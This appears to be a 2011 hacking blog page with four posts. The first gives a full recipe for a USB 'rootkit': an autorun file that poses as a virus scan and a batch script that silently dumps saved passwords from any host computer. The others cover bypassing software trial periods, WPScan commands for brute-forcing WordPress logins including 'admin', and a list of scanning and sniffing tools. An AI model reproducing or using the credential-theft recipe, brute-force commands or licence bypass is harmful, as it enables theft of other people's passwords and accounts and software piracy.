Friday, July 29, 2011

How to sniff Passwords using USB Drive

Anyone can steal stored passwords from any computer and that too by using your USB drive.
Can’t believe!
Read on..
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to Hack Software and run Trial Program Forever

We can run any trial software for ever.
just read on..
Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?
Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.
When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista. (havent tried it with Windows 7)
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly. If you run the software directlyeven once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.
For example, if the trial period expires on Apr 30 2011, always inject the date as Apr 29 2011 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.

WPScan – WordPress Security Scanner

What is WPScan?

WPScan is wonderful and super fast wordpress vulnerability scanner written in ruby language, sponsored byRandomStorm and hosted by Googlecode. It provides you an easy way to penetrate wordpress blogs using blackbox techniques.
You can find the following stuff about any wordpress blog using this ruby application:
  • List of plugins
  • Name of theme
  • Bruce forcing Weak Password for specific user
  • Brute force username
  • Directory listings
  • Version details
  • Possible vulnerabilities.
How to Install WPScan?
Before you install WPScan, you have to install number of dependencies essential by this tiny ruby application. BTW i am using BackTrack5 Linux.
Dependencies :
apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus
WPScan Installation :
cd /pentest/web/
cd wpscan

How to use WPScan?
It is almost cooked. One more thing we need here; is to download keywords database which will be used for brute forcing.
gunzip darkc0de.lst.gz
Example usage of this ant application :
Do ‘non-intrusive’ checks…
ruby ./wpscan.rb --url
Do wordlist password brute force on enumerated users using 50 threads…
ruby ./wpscan.rb --url --wordlist darkc0de.lst --threads 50
Do wordlist password brute force on the ‘admin’ username only…
ruby ./wpscan.rb --url --wordlist darkc0de.lst --username admin
Generate a new ‘most popular’ plugin list, up to 150 pages…
ruby ./wpscan.rb --generate_plugin_list 150
Enumerate instaled plugins…
ruby ./wpscan.rb --enumerate p

7 Must Have Tools For Every Hacker


7 Must Have Tools For Every Hacker

Hacking tools are developed by some really good coders out there to ease out many complex tasks which have to be done manually and took painstakingly great deal of time and effort.All these tools provided here are free of cost,are tried hands on and are being actively developed by community,and  if not,their alternatives are provided.To summarize it up,these are the 7 must have tools for every hacker out there

1. Nmap 
I think everyone has heard of this one, it recently had a version 5 release.
Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use,and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.

Download Nmap

2. Nessus Remote Security Scanner 
Recently went closed source, but is still essentially free. Works with a client-server framework.Nessus is the worlds  most popular vulnerability scanner used in over 75,000organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Download Nessus

3. Wireshark 
If you have been reading my site,you might have read about it in a couple of articles.Wireshark is a GTK+-based  network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstructTCP/IP Streams! .

Download Wireshark

4. Cain and Abel 
The swiss knife of hacking tools..Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Download Cain and Abel

5. Kismet 
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with  any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon

Download Kismet

6. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
  1. Verify that your network is set up the way you intended.
  2. Find locations with poor coverage in your WLAN.
  3. Detect other networks that may be causing interference on your network.
  4. Detect unauthorized rogue access points in your workplace.
  5. Help aim directional antennas for long-haul WLAN links.
  6. Use it recreationally for WarDriving.

Download Netstumbler

7. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.
Alternatively,you can try Angry IP Scanner which is a pretty good replacement for it.

Download SuperScan